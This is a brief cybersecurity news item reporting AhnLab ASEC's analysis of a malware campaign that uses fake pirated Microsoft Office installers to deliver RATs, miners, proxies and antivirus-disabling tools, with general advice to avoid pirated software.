AI DevwWrld CyberDSA Chatbot Summit Cyber Revolution Summit CYSEC Global Cyber Security & Cloud Expo World Series Digital Identity & Authentication Summit Asian Integrated Resort Expo Middle East Low Code No Code Summit TimeAI Summit

Distribution of malware via counterfeit copies of Microsoft Office

Malware campaign analysis using counterfeit installers of popular software

A malware campaign distributes pirated software, exploiting fake Microsoft Office installers. Download URLs point to legitimate services, making identification difficult. The malware includes RATs, cryptocurrency miners and antivirus evasion tools.

This pill is also available in Italian language

The AhnLab Security Intelligence Center (ASEC) has revealed a new malicious campaign targeting users looking for pirated versions of popular software such as Microsoft Office, Windows, and Hangul Word Processor. Hackers exploit fake Microsoft Office installers, tricking victims with a well-designed interface that allows them to choose between different versions, languages, and 32-bit or 64-bit architectures. Behind this facade, various types of malware are hidden, including RATs, cryptocurrency miners, droppers, proxies and antivirus evasion systems. The fake installer launches obfuscated .NET malware, which connects to messaging channels such as Telegram or Mastodon to obtain a genuine download URL.

Malware distribution methodology

The distributed URLs point to legitimate services such as Google Drive or GitHub, making it more difficult for antiviruses to identify them. The payloads are base64 encoded and contain PowerShell commands that unpack different malware strains using 7Zip. Among the components identified, there is a malware called "Updater", which exploits the Windows Task Scheduler to ensure the persistence of threats even after a system restart. This sophisticated technique allows attackers to maintain continuous access to the compromised system, making it difficult for victims to completely wipe their devices once infected.

Types of malware involved

ASEC research identified various types of malware installed via this campaign. Among these, Orcus RAT is a remote access Trojan that allows total control of the system, with keylogging functions, webcam access and other exfiltration capabilities. XMRig is a cryptocurrency miner that leverages system resources to mine Monero, suspending mining during heavy resource use to avoid suspicion. 3Proxy turns infected systems into proxy servers, allowing attackers to route malicious traffic. PureCrypter downloads and executes additional malicious payloads, ensuring continued infection. Finally, AntiAV disables security software, manipulating its configuration files to prevent it from working properly and leaving the system vulnerable.

Implications and advice for users

This strategy of infection through pirated software is not new but continues to be effective, as demonstrated by the spread of the STOP ransomware, currently one of the most active ransomware operations targeting consumer users. Pirated programs lack digital signatures and users tend to ignore security warnings since they know they are using unofficial material. This behavior, combined with any easily overlooked graphic discrepancies, makes pirated files an ideal vector for malware infections. You are strongly advised to avoid downloading and installing pirated software and always use authentic and updated versions of programs to avoid security compromises.

Follow us on Telegram for more pills like this

06/02/2024 08:31

Marco Verro

Last pills

Google Cloud security predictions for 2024: how AI will reshape the cybersecurity landscapeFind out how AI will transform cybersecurity and address geopolitical threats in 2024 according to Google Cloud report

AT&T: data breach discovered that exposes communications of millions of usersDigital security compromised: learn how a recent AT&T data breach affected millions of users

New critical vulnerability discovered in OpenSSH: remote code execution riskFind out how a race condition in recent versions of OpenSSH puts system security at risk: details, impacts and solutions to implement immediately

Discovery of an AiTM attack campaign on Microsoft 365A detailed exploration of AiTM attack techniques and mitigation strategies to protect Microsoft 365 from advanced compromises